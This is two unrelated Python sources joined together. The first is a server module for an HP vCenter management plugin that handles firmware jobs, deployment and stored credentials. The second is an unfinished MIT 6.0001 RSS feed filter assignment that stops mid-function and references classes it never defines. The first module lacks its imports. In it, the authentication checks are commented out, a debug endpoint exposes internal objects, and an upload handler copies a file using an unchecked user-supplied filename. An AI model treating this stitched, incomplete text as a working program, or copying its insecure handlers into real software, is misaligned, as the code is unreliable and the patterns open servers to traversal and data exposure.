from portlets.cluster import ClusterSwFwDetail
from portlets.collector import Collector, ClusterCollector
from urlparse import urlparse
from urllib import unquote
from core.uim import UIManager
import portlets.collector
import time
urls = [
'/debug/(.*)', 'wdebug',
'/debug/', 'wdebug',
'/services/clusterswfwdetail', 'ClusterSwFwDetail',
'/services/', 'wservices',
'/services/(.*)', 'wservices',
'/deployment/', 'deployment',
'/firmware/', 'firmware',
'/firmware', 'firmware',
'/firmware/jobs', 'firmware_jobs',
'/firmware/jobs/', 'firmware_jobs',
'/smart_components', 'smart_components',
'/settings/(.+)', 'Settings',
'/uidcontrol', 'UIDControl',
'/cva/summary(/|)', 'CVASummary',
'/cva/summary/(.+)(/|)', 'CVASummary',
]
service_dispatcher = {'hostsummary': Host.summary,
'hostdetail': Host.detail,
'hoststatus': Host.hoststatus,
'networksummary': Network.summary,
'networkdetail': Network.detail,
'hostswfwsummary': Host.swfwsummary,
'hostswfwdetail': Host.swfwdetail,
'hostinfrasummary': Host.infrasummary,
'hostinfradetail': Host.infradetail,
'hostlaunchtools': Host.launchtools,
'hostsimlaunchinfo': Host.simlaunchinfo,
'hostcommsummary': Host.commsummary,
'clustersummary': cluster.summary,
'clusterdetail': cluster.detail,
'clusterinfrasummary': cluster.infrasummary,
'clusterinfradetail': cluster.infradetail,
'clusterswfwsummary': cluster.swfwsummary,
'clusterlaunchtools': cluster.launchtools,
'clusterstatus': cluster.clusterstatus,
'cvasummary': cva.summary,
'cvadetail': cva.summary,
'getsummary': cva.getsummary,
'getdetail': cva.getsummary,
'vdisksummary': cva.getvdisk,
'vdiskdetail': cva.getvdisk,
'vdisksummary2': cva.putvdisk,
'vdiskdetail2': cva.putvdisk,
'driversummary': cva.postdriver,
'driverdetail': cva.postdriver,
}
class SudsEncoder(json.JSONEncoder):
'''
A JSON Encoder that understands suds object types.
'''
def default(self, obj):
if isinstance(obj, SudsObject):
d = dict(__classname__=obj.__class__.__name__)
for k in obj.__keylist__:
d[k] = obj.__dict__[k]
return d
return json.JSONEncoder.default(self, obj)
class CVASummary:
def GET(self, item=None):
from portlets import cva
s = web.session
try:
data = s.cva_summary_data
except AttributeError:
data = s.cva_summary_data = cva.cva.summary_test()
return json.dumps(data)
def DELETE(self, uuid, item=None):
from portlets import cva
s = web.session
try:
__data__ = s.cva_summary_data
except AttributeError:
__data__ = {}
uuid = uuid.split('/')[0]
for name,items in __data__.iteritems():
i = 0
for item in items:
if (item.has_key('uuid') and (str(item['uuid']) == str(uuid))):
del items[i]
i += 1
return json.dumps(__data__)
def POST(self, item=None):
from portlets import cva
s = web.session
try:
__data__ = s.cva_summary_data
except AttributeError:
__data__ = {}
data = web.input()
if (len(str(data['uuid'])) > 0):
for name,items in __data__.iteritems():
for item in items:
if (item.has_key('uuid') and (str(item['uuid']) == str(data['uuid']))):
for k,v in data.iteritems():
if (k != 'uuid'):
item[k] = v
else:
import uuid
item = {'uuid':str(uuid.uuid4())}
for k,v in data.iteritems():
if (k != 'uuid'):
item[k] = v
__data__['vdisks'].append(item)
s.cva_summary_data = __data__
return json.dumps(__data__)
class wservices:
def GET(self, item=None):
#session.any_auth()
log.debug('GET wservices %s', item)
if item not in service_dispatcher :
raise web.notfound()
data = service_dispatcher[item]()
return json.dumps(data, cls=SudsEncoder)
class UIDControl:
def PUT(self):
log.debug('uidcontrol')
dc = Collector.get_collector()
cstate = dc.ilo.get('data', {}).get('get_uid_status', {}).get('uid', 'off')
log.debug('Current UID state: %s', cstate)
setstate = 'off'
if cstate.lower() == 'off':
setstate = 'on'
log.debug('Setting UID state to: %s', setstate)
dc.csce.entity_control('ilo', dc.ilo['uuid'], 'uid', setstate)
taskQ = catalog.lookup('ic4vc-server-threadpool').get_q()
taskQ.put((dc.csce.force_update_entity, ('ilo', dc.ilo['uuid'])))
taskQ.put((dc.delayed_update, (30, [True, False])))
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme )
desc = 'UID State Toggled from ' + cstate + ' to ' + setstate
objpath = 'moref=' + dc.moref + '&' + 'serverGuid=' + dc.serverGuid
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
class wdebug:
def GET(self, item=None):
#session.any_auth()
log.debug('Getting catalog item=%s', item)
if item == 'catalog':
q = web.input()
if not q.get('item'):
keys = catalog.keys()
keys.sort()
return keys
else:
web.http.expires(0)
item = q.get('item')
val = catalog.lookup(item)
return val.__dict__.items() if val else None
class deployment:
def get_dc(self):
try:
return [dc for dc in catalog.get_all() if isinstance(dc, ALDeploymentConnector)][0]
except:
return None
def refresh(self):
ALDeploymentConnector.create()
def clear(self):
dc = self.get_dc()
if dc:
dc.clear_finished_jobs()
def updateFolders(self, folders):
dc = self.get_dc()
if dc:
dc.updateJobFolders(folders)
return {}
return {}
def GET(self):
log.debug("calling get_dc()")
dc = self.get_dc()
q = web.input()
log.debug(q)
vc_guid = q.serverGuid.lower()
if dc:
log.debug("in if dc:")
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
deployment_obj = {}
log.debug("calling dc.getJobFolders()")
deployment_obj['JobFolders'] = dc.getJobFolders()
log.debug("calling dc.getManagedNodes()")
deployment_obj['ManagedNodes'] = dc.getManagedNodes()
log.debug("calling dc.getDcStatus()")
deployment_obj['Status'] = dc.getDcStatus()
try:
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==vc_guid]
except:
log.debug('error iterating over vc list')
vc = vc[0]
log.debug("calling vc.retreive_cluster_list()")
clusters = vc.retreive_cluster_list()
names = []
for cluster in clusters:
try:
for prop in cluster.propSet:
if prop.name == 'name':
names.append(prop.val)
except:
pass
deployment_obj['Clusters'] = names
log.debug("vc.retrieve_datacenter_list()")
datacenters = vc.retrieve_datacenter_list()
names = []
for datacenter in datacenters:
try:
for prop in datacenter.propSet:
if prop.name == 'name':
names.append(prop.val)
except:
pass
deployment_obj['Datacenters'] = names
else:
deployment_obj = {}
deployment_obj['Status'] = {'errno':'-1', 'message':'The deployment service is starting.'}
log.debug(json.dumps(deployment_obj))
return json.dumps(deployment_obj)
def POST(self):
log.debug('In POST...')
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
q = web.input()
item = ''
if hasattr(q, 'action'):
item = q.action
if item == '':
deployment_data = json.loads(web.data())
dc = self.get_dc()
if not dc:
raise web.notfound()
dc.begin_run_deployment(deployment_data)
log.debug('Calling dc.begin_run_deployment')
obj = {}
obj['Status'] = {'errno':'8', 'message':'Started job(s)'}
# just return something or the jquery callback won't fire.
log.debug('returning empty object')
return json.dumps(obj)
elif item == 'refresh':
self.refresh()
sleep(1)
while True:
if self.get_dc():
return self.GET()
sleep(1)
elif item == 'clear':
self.clear()
return self.GET()
elif item == 'updateFolders':
log.debug('Calling self.updateFolders')
folders = json.loads(web.data())
result = self.updateFolders(folders)
return json.dumps(result)
return ""
class firmware:
def get_vc(self, serverGuid):
vcs = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
if len(vcs) == 1:
return vcs[0]
else:
return None
def get_host(self, serverGuid, moref):
vc = self.get_vc(serverGuid)
if not vc:
return None
hosts = [host for host in vc.hosts if host.moref().lower()==moref.lower()]
if len(hosts) == 1:
return hosts[0]
else:
return None
def get_hosts(self, serverGuid, moref):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
vc = vc[0]
clusters = vc.retreive_cluster_list()
hosts = []
for cluster in clusters:
mob = cluster.obj._type + ':' + cluster.obj.value
if mob.lower()==moref.lower():
for prop in cluster.propSet:
if prop.name == 'host':
for host in prop.val[0]:
mob = host._type + ':' + host.value
hosts.append(self.get_host(serverGuid, mob))
return hosts
def POST(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
if not 'package_url' in input:
raise web.badrequest()
log.debug('firmware POST %s %s', q.moref, input['package_url'])
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
package_url = input['package_url']
options = input['options']
if q.moref.split(':')[0] == 'ClusterComputeResource':
data = []
for host in item:
# Only execute the requested job on the selected hosts.
if host.name in input['hosts']:
log.debug('firmware queuing job for host %s', host.name)
result = host.host_firmware.queue_firmware_job(package_url, options)
try :
desc = 'Firmware job queued - ' + input['package_url']
objpath = 'moref=' + q.moref + '&' + 'serverGuid=' + q.serverGuid
log.debug('Newsfeed ' + desc)
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme, host = uim_url.hostname )
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
except :
log.exception("Error generating newsfeed for firmware job queued")
else:
result = host.host_firmware.get_firmware_jobs()
data.append({'Host': host.name, 'FirmwareJobs': result})
#json.dump(data, open('firmware_resp.json', 'w+'), indent=4) #debug
return json.dumps(data)
else:
result = item.host_firmware.queue_firmware_job(package_url, options)
try :
desc = 'Firmware job queued - ' + input['package_url']
objpath = 'moref=' + q.moref + '&' + 'serverGuid=' + q.serverGuid
log.debug('Newsfeed ' + desc)
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme, host = uim_url.hostname )
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
except :
log.exception("Error generating newsfeed for firmware job queued")
return json.dumps(result)
return None
else:
raise web.notfound()
def DELETE(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
if not 'package_url' in input:
raise web.badrequest()
log.debug('firmware DELETE job %s %s', q.moref, input['package_url'])
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
if q.moref.split(':')[0] == 'ClusterComputeResource':
json_str = '['
for host in item:
if host.name in input['hosts']:
result = host.host_firmware.delete_queued_job(input['package_url'])
if not result :
raise web.notfound()
json_str += '{"Host":' + '"' + host.name + '", "FirmwareJobs":'
json_str += json.dumps(result) + '},'
else:
result = host.host_firmware.get_firmware_jobs()
json_str += '{"Host":' + '"' + host.name + '", "FirmwareJobs":'
json_str += json.dumps(result) + '},'
return json_str + ']'
else:
result = item.host_firmware.delete_queued_job(input['package_url'])
if not result :
raise web.notfound()
return json.dumps(result)
return None
else:
raise web.notfound()
class firmware_jobs:
def get_vc(self, serverGuid):
vcs = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
if len(vcs) == 1:
return vcs[0]
else:
return None
def get_host(self, serverGuid, moref):
vc = self.get_vc(serverGuid)
if not vc:
return None
hosts = [host for host in vc.hosts if host.moref().lower()==moref.lower()]
if len(hosts) == 1:
return hosts[0]
else:
return None
def get_hosts(self, serverGuid, moref):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
vc = vc[0]
clusters = vc.retreive_cluster_list()
hosts = []
for cluster in clusters:
mob = cluster.obj._type + ':' + cluster.obj.value
if mob.lower()==moref.lower():
for prop in cluster.propSet:
if prop.name == 'host':
for host in prop.val[0]:
mob = host._type + ':' + host.value
h = self.get_host(serverGuid, mob)
if h :
hosts.append(h)
return hosts
def GET(self):
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
log.debug("firmware_jobs GET %s", q.moref)
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
if q.moref.split(':')[0] == 'ClusterComputeResource':
data = []
for host in item:
if host:
i = {}
i['Host'] = host.name
i['FirmwareJobs'] = host.host_firmware.get_firmware_jobs()
data.append(i)
return json.dumps(data)
else:
jobs = item.host_firmware.get_firmware_jobs()
return json.dumps(jobs)
else:
raise web.notfound()
class smart_components:
def GET(self):
log.debug("smart_components GET")
q = web.input()
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
scm = get_scm()
obj = {
'components': scm.json()
}
return json.dumps(obj)
def POST(self):
# We have to use the text/html type here even though the format is json. This is so that
# we can load the data in a hidden frame and parse it as javascript.
web.header('Content-Type', 'text/html')
web.http.expires(0)
inputdata = json.loads(web.data())
log.debug("smart_components POST %s", inputdata['filename'])
# This is key - make sure we don't treat binary files as unicode. Also make sure to
# use the binary file mode (wb) when writing the file.
obj = {}
try:
filename = inputdata['filename']
scm = get_scm()
if not os.path.exists('static/sc_share'):
os.makedirs('static/sc_share')
import shutil
shutil.copyfile('../uim/static/sc_share/' + filename, 'static/sc_share/' + filename)
scm.add_component(filename)
obj['status'] = '0'
obj['message'] = 'Component upload successful'
obj['components'] = scm.json()
except Exception as err:
log.exception("Error saving smart component '%s'", inputdata)
obj['status'] = '-1'
obj['message'] = 'Component upload failed: '+str(err)
return json.dumps(obj)
def DELETE(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not 'sc_filename' in input:
raise web.badrequest()
log.debug("smart_components DELETE %s", input['sc_filename'])
scm = get_scm()
scm.delete_component(input['sc_filename'])
obj = {
'components': scm.json()
}
return json.dumps(obj)
class Settings:
def parse_data(self):
op = ''
obj = {}
d = web.data()
data = web.data().split('&')
input = web.input()
for item in data:
kv = item.split('=')
kv[1] = kv[1].replace('+', ' ')
if kv[0] == 'oper':
op = unquote(kv[1])
else:
obj[kv[0]] = unquote(kv[1])
return op, obj
def GET(self, service):
if service == 'config':
cfg = config()
srvcfg = cfg.get_server_config()
data = []
data.append({'param_name': 'HP SIM Port', 'param_value': srvcfg['hpsim']['port']})
data.append({'param_name': 'Device Poll Interval', 'param_value': srvcfg['device_poll']})
data.append({'param_name': 'Event Poll Interval', 'param_value': srvcfg['event_poll']})
data.append({'param_name': 'Power Cost', 'param_value': srvcfg['power_cost']})
data.append({'param_name': 'Virtual Connect Uplink Over Subscription Factor', 'param_value': srvcfg.get('bottleneck_oversub', '1.2')})
return json.dumps({'srvcfg' : data})
elif service == 'hostproperties':
hostpw = None
ilopw = None
dc = Collector.get_collector()
iloaddr = dc.server.get('data', {}).get('summary',{}).get('iLOAddress', None) if dc.server else None
if not iloaddr:
iloaddr = dc.ilo.get('address', {}).get('ipv4', None) if dc.ilo else None
if not iloaddr:
iloaddr = getattr(dc.host,'associated_ilo', None)
vmwhost = getattr(dc.host_detail, 'name', None)
#csce = catalog.lookup('engines.csc_engine')
#if iloaddr:
# ilopw = csce.get_password('', 'iLO', iloaddr)
#if vmwhost:
# hostpw = csce.get_password('', 'ProLiant Server', vmwhost)
if iloaddr:
ilopw = self.find_pw_for_host_and_type(iloaddr, 'iLO')
if not ilopw:
ilopw = self.find_global_pw('iLO')
if vmwhost:
hostpw = self.find_pw_for_host_and_type(vmwhost, 'ProLiant Server')
if not hostpw:
hostpw = self.find_global_pw('ProLiant Server')
pwlist = []
if ilopw:
pwlist.append({'host': ilopw['host'], 'username': ilopw['username'], 'password': '', 'type': 'iLO'})
else:
pwlist.append({'host': iloaddr, 'username': '', 'password': '', 'type': 'iLO'})
if hostpw:
pwlist.append({'host': hostpw['host'], 'username': hostpw['username'], 'password': '', 'type': 'ProLiant Server'})
else:
pwlist.append({'host': vmwhost, 'username': '', 'password': '', 'type': 'ProLiant Server'})
return json.dumps({'hostprop': pwlist})
elif service == 'clusterproperties':
cprops = []
cprops.append({'username': '', 'password': '', 'type': 'iLO'})
return json.dumps({'clusterprop': cprops})
elif service == 'password':
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
pwlist = [pw for pw in pwlist if (pw['type'] not in ('HP Common Services', 'vCenter'))]
return json.dumps(pwlist)
def find_pw_in_cspw_list(self, data):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if (data.has_key('id') and pw['id'] == data['id']) or \
(data.has_key('username') and pw['username'] == data['username'] and \
data.has_key('type') and pw['type'] == data['type'] and \
data.has_key('host') and pw['host'] == data['host'] ):
return pw
return None
def find_pw_for_host_and_type(self, host, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
log.debug('looking for password %s, %s', host, pwtype)
for pw in pwlist:
if (pw['type'] == pwtype and pw['host'] == host ):
return pw
return None
def find_global_pw(self, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if ( pw['type'] == pwtype and pw['host'] == '*' ):
return pw
return None
def pwtype_exists(self, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if (pw['type'] == pwtype):
return pw
return None
def POST(self, service):
runAfterSavingConfig = []
oper, data = self.parse_data()
if service in ('password', 'vcpassword'):
csce = catalog.lookup('engines.csc_engine')
vce = catalog.lookup('ic4vc-vc_engine')
if oper == 'del':
log.debug("****Credential DEL")
pw = self.find_pw_in_cspw_list(data)
if pw:
csce.del_password_from_cs(pw['id'], pw['username'], pw['type'], pw['host'])
if pw['type'] == 'vCenter':
vce.delete_vc(pw)
else :
log.error('Error deleting credential: Unable to find credential')
raise web.notfound('Unable to find credential.')
elif oper == 'edit':
log.debug("Credential EDIT")
pw = self.find_pw_in_cspw_list(data) # edit DOES NOT WORK because if the username is changed it will not find the cred
if pw:
if data['password'] != '****************' and data['password'].strip() !='' :
csce.update_password(pw['id'], data['username'], data['password'], data['type'], data['host'])
if pw['type'] == 'vCenter':
vce.edit_vc(data)
else:
log.error('Error editing credential: No Password')
raise web.forbidden(data='The password must be set.')
else:
log.error("Error editing credential: not found")
raise web.notfound('Unable to find credential.')
elif oper == 'add':
log.debug("Credential ADD")
if data['type'] == 'HP SIM':
pw = self.pwtype_exists(data['type'])
if pw:
log.error("Error adding credential: Only one HP SIM credential allowed")
raise web.forbidden(data = 'Only one HP SIM entry is allowed')
pw = self.find_pw_in_cspw_list(data)
if not pw:
try :
csce.add_password_to_cs(data['username'], data['password'], data['type'], data['host'])
except:
log.exception("Error adding credential: Error adding credential for vCenter %s", data['host'])
raise web.internalerror("Error adding credential")
else:
log.error("Error adding credential: Credential already exists")
raise web.conflict('Credential already exists.')
if data['type'] == 'vCenter':
runAfterSavingConfig.append( (vce.add_vc, (data,)) )
else:
log.error("Error in editing credential: operation '%s' not supported.", oper)
raise web.notfound('Operation Not Supported')
if oper != 'del':
if data['type'] == 'HP SIM':
runAfterSavingConfig.append( (ALDeploymentConnector.create, tuple() ) )
if data['type'] == 'iLO' and data['host'] != '*':
csce.associate_ilo(data['host'])
#log.debug(data)
elif service == 'config':
if oper == 'edit':
cfg = config()
srvcfg = cfg.get_server_config()
if data['param_name'] == 'HP SIM Port':
srvcfg['hpsim']['port'] = data['param_value']
runAfterSavingConfig.append( (ALDeploymentConnector.create, tuple() ) )
elif data['param_name'] == 'Device Poll Interval':
srvcfg['device_poll'] = data['param_value']
elif data['param_name'] == 'Event Poll Interval':
srvcfg['event_poll'] = data['param_value']
elif data['param_name'] == 'Power Cost':
srvcfg['power_cost'] = data['param_value']
elif data['param_name'] == 'Virtual Connect Uplink Over Subscription Factor':
srvcfg['bottleneck_oversub'] = data['param_value']
cfg.set_server_config(srvcfg)
else:
log.error("Error editing config: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
elif service == 'hostproperties':
if oper == 'edit':
if data['host'] != '*' and data['password'] != '****************' and data['password'].strip() !='' :
dc = Collector.get_collector()
if dc.host:
csce = catalog.lookup('engines.csc_engine')
vce = catalog.lookup('ic4vc-vc_engine')
csce.add_password_to_cs(data['username'], data['password'], data['type'], data['host'])
if data['type'] == 'iLO':
csce.associate_ilo(data['host'])
setattr(dc.host, 'associated_ilo', data['host'])
else:
log.error("Error editing host properties: host has not been discovered yet.")
raise web.notfound('Host has not been discovered yet.')
else:
if data['host'] == '*' :
log.error("Error editing host properties: host=* Cannot set global from host.")
raise web.forbidden(data='Global credentials cannot be set here.')
elif data['password'] == '****************' or data['password'].strip() == '' :
log.error("Error setting host properties - password is blank or *.")
raise web.forbidden(data='The password must be set.')
else :
log.error("Error editing host properties - unknown error.")
raise web.forbidden(data='Error editing host properties.')
else:
log.error("Error in editing host properties: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
elif service == 'clusterproperties':
log.debug('clusterproperties')
if oper == 'edit':
log.debug('clusterproperties edit')
if data['password'] != '****************' and data['password'].strip() !='' and data['username'].strip() != '' :
dc = ClusterCollector.get_collector()
csce = catalog.lookup('engines.csc_engine')
if data['type'] == 'iLO':
log.debug('clusterproperties edit iLO')
creds_set = 0
if not len(dc.hosts) :
log.error("Error editing cluster properties: Cluster %s is empty", dc.cluster.name)
raise web.notfound("No hosts in this cluster.")
for host in dc.hosts :
log.debug("Cluster Properties setting credentials for host '%s'", host.name)
iloaddress = dc.ilo_address(host.hardware.systemInfo.uuid)
if iloaddress:
csce.add_password_to_cs(data['username'], data['password'], data['type'], iloaddress)
creds_set+=1
else :
log.error("Error editing cluster properties: No iLO address for host '%s'", host.name)
if not creds_set :
log.error('Error editing cluster properties: No hosts set of %d.', len(dc.hosts) )
raise web.notfound('Unable to set any hosts.')
if creds_set != len(dc.hosts) :
log.error('Error editing cluster properties: Only set %d of %d hosts.', creds_set, len(dc.hosts) )
raise web.notfound('Only set %d of %d hosts.' % (creds_set, len(dc.hosts)))
else :
log.error("Error in editing cluster properties: type '%s' not supported.", data['type'])
raise web.notfound('This type is not supported')
else:
if data['username'].strip() == '' :
log.error("Error editing cluster properties: username is blank.")
raise web.forbidden(data='Username cannot be blank.')
elif data['password'] == '****************' or data['password'].strip() == '' :
log.error("Error setting cluster properties - password is blank or *.")
raise web.forbidden(data='The password must be set.')
else :
log.error("Error editing cluster properties - unknown error.")
raise web.forbidden(data='Error editing cluster properties.')
else:
log.error("Error in editing cluster properties: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
else:
log.error("Error in Settings: service '%s' not supported", service)
raise web.notfound('Service not supported')
taskQ = catalog.lookup('ic4vc-server-threadpool').get_q()
for f in runAfterSavingConfig:
taskQ.put(f)
return
class mywebapp(web.application):
def run(self, certinfo, server_address=('0.0.0.0', 8080), timeout=900, rqs=10, nthreads=20, *middleware):
func = self.wsgifunc(*middleware)
altaddress = ('localhost', server_address[1])
self.server = CherryPyWSGIServer(altaddress, func, timeout=timeout, request_queue_size=rqs, numthreads=nthreads)
self.server.thread_name = 'HPIC4VCServer'
log.info('https://%s:%d/' % altaddress)
try:
self.server.start()
except KeyboardInterrupt:
self.server.stop()
class ServerWebApp:
def __init__(self):
self.cfg = config()
self.server_cfg = self.cfg.get_server_config()
self.server_root = self.cfg.get_server_root()
self.server_url = urlparse(self.server_root)
self.proto = self.server_url.scheme
log.debug(self.server_url.port)
self.server_address = (self.server_url.hostname, self.server_url.port)
catalog.insert(self, 'ServerWebApp')
def start_collection(self, handler):
try:
portlets.collector.remove_old_collectors()
q = web.input()
if hasattr(q, 'moref'):
if q.moref.startswith('HostSystem'):
Collector.get_collector()
elif q.moref.startswith('ClusterComputeResource'):
ClusterCollector.get_collector()
except:
log.exception('error start_collection')
return handler()
def start(self):
self.mywebappthread = Thread(name='server-ServerWebApp', target=self.startmywebapp)
self.mywebappthread.daemon = True
self.mywebappthread.start()
def startmywebapp(self):
self.app = mywebapp(urls, globals())
timeout = int(self.server_cfg.get('webserver', {}).get('timeout', 60))
rqs = int(self.server_cfg.get('webserver', {}).get('req_queue', 10))
nthreads = int(self.server_cfg.get('webserver', {}).get('num_threads', 20))
self.app.add_processor(self.start_collection)
self.app.run(self.cfg.get_cert_info(), self.server_address, timeout = timeout, rqs=rqs, nthreads=nthreads)
def stop(self):
# This is where you will need to do all the cleanup
self.app.server.stop()
pass
def start():
cfg = config()
server_root = cfg.get_server_root()
server_url = urlparse(server_root)
server_address = (server_url.hostname, server_url.port)
app = mywebapp(urls, globals())
app.run(cfg.get_cert_info(), server_address)
if (__name__ == '__main__'):
app = web.application(urls, globals())
session = web.session.Session(app, web.session.DiskStore('sessions'), initializer={})
app.run()
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name:
# Collaborators:
# Time:
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
#======================
# Data structure design
#======================
# Problem 1
class NewsStory(object):
def __init__(self, guid, title, description, link, pubdate):
self.guid = guid
self.title = title
self.description = description
self.link = link
self.pubdate = pubdate
def get_guid(self):
return self.guid
def get_title(self):
return self.title
def get_description(self):
return self.description
def get_link(self):
return self.link
def get_pubdate(self):
return self.pubdate
#======================
# Triggers
#======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
# TODO: PhraseTrigger
class PhraseTrigger(Trigger):
def __init__(self, phrase):
self.phrase = phrase.lower()
def is_phrase_in(self, text):
# Replaces punctuation with ' '
for char in string.punctuation:
text = text.lower().replace(char, ' ')
# Converts text to a list by splitting between spaces and getting rid of blanks
textList = text.split(' ')
textList = [i for i in textList if not i == '']
phraseList = self.phrase.split(' ')
# Check each index in textList to see if the phrase is there
for idx in range(0, len(textList) - len(phraseList) + 1):
if textList[idx:idx+len(phraseList)] == phraseList:
return True
return False
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
def evaluate(self, newsStory):
return self.is_phrase_in(newsStory.get_title())
# Problem 4
# TODO: DescriptionTrigger
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
# Problem 8
# TODO: AndTrigger
# Problem 9
# TODO: OrTrigger
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
# TODO: Problem 10
# This is a placeholder
# (we're just returning all the stories, with no filtering)
return stories
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
trigger_file = open(filename, 'r')
lines = []
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line)
# TODO: Problem 11
# line is the list of lines that you need to parse and for which you need
# to build triggers
print(lines) # for now, print it so you see what it contains!
SLEEPTIME = 120 #seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
t1 = TitleTrigger("election")
t2 = DescriptionTrigger("Trump")
t3 = DescriptionTrigger("Clinton")
t4 = AndTrigger(t2, t3)
triggerlist = [t1, t4]
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
# triggerlist = read_trigger_config('triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
